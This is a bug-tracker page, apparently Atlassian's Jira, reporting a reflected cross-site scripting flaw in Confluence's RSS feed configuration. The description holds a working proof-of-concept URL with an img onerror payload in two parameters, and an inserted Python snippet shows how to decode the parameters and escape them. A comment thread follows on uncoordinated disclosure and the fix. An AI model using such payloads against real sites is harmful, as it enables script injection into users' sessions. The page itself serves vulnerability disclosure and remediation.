Details

    • Last commented by user?:
      false
    • CVSS Score:
      7.5

      Description

      Filed by Vitaly Osipov [Atlassian] on behalf of Muhammad Waqar.

      
      http://$hostname/dashboard/doconfigurerssfeed.action?types=page&pageSubTypes=comment&pageSubTypes=attachment&types=blogpost&blogpostSubTypes=comment&blogpostSubTypes=attachment&types=mail&spaces=conf_all&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&excludedSpaceKeys=&sort=modified&maxResults=11&timeSpan=5&showContent=true&showDiff=true&confirm=Create+RSS+Feed
      
      

      Works in Firefox.
      Note: title and labelString parameters need encoding.
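The note above says the title and labelString parameters need encoding. The following is an added illustration (not Confluence code and not part of the original report) that decodes an abbreviated copy of the query string from the URL above, lists the parameters whose decoded values contain HTML-significant characters, and shows the effect of output encoding. The `render_input` template and the attribute context it uses are assumptions; the page does not show where Confluence reflects these values.

```python
from html import escape
from urllib.parse import parse_qsl

# Query string abbreviated from the URL in the description above.
QUERY = (
    "types=page&spaces=conf_all"
    "&title=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E"
    "&labelString=%23%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E"
    "&sort=modified&maxResults=11"
)

# Characters that change meaning inside HTML text or attribute values.
HTML_SIGNIFICANT = set("<>\"'&")


def risky_params(query):
    """Return {name: decoded value} for every parameter whose decoded
    value contains at least one HTML-significant character."""
    found = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if HTML_SIGNIFICANT & set(value):
            found[name] = value
    return found


def render_input(name, value, encode=True):
    """Echo `value` into a double-quoted attribute.

    Hypothetical template (assumption): stands in for whatever markup
    reflects the parameter. With encode=False the value is written raw,
    which is the behaviour the report describes.
    """
    shown = escape(value, quote=True) if encode else value
    return f'<input type="text" name="{name}" value="{shown}">'


if __name__ == "__main__":
    for name, value in risky_params(QUERY).items():
        print(name, "->", repr(value))
        print("  unencoded:", render_input(name, value, encode=False))
        print("  encoded:  ", render_input(name, value))
```

With encoding applied, the quote and angle brackets in the decoded value stay inside the attribute as character references, so no new element is created.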

            Activity

            vosipov Vitaly Osipov [Atlassian] added a comment - Note: Muhammad Waqar published this advisory without coordinating with us http://packetstormsecurity.com/files/122717/Atlassian-Confluence-5.3-Cross-Site-Scripting.html
            write.muhammadwaqar Muhammad Waqar added a comment -

            This is because I received notification that bug has been fixed.

            vosipov Vitaly Osipov [Atlassian] added a comment -

            Muhammad Waqar From where did you receive this notification? This issue is still open as you can see.

            write.muhammadwaqar Muhammad Waqar added a comment -

            Yes, I can see. I had received it via email, same as other notifications are arriving.

            vosipov Vitaly Osipov [Atlassian] added a comment -

            Muhammad Waqar, this is interesting - according to the history tab the state of this issue has never changed to resolved: https://jira.atlassian.com/browse/CONF-30240?page=com.atlassian.streams.streams-jira-plugin:activity-stream-issue-tab

            Regardless of that, do you think that publishing an advisory without any coordination with the vendor is a good disclosure policy?

            write.muhammadwaqar Muhammad Waqar added a comment -

            Greetings Osipov,
            At first look I thought the issue might be fixed, and so it resulted in disclosure. Realized now that it might be tested then.
            I will make sure that this won't happen again. Sorry for the inconvenience.
            Have a good day!
            Regards,
            Muhammad Waqar

            dblack David Black added a comment -

            I have QA'ed remotes/origin/confluence-project-5.2-stable as being fixed.


              People

              • Votes:
                0
              • Watchers:
                6

                Dates

                • Created:
                  Updated:
                  Resolved:
                  Last commented:
                  2 years, 46 weeks, 1 day ago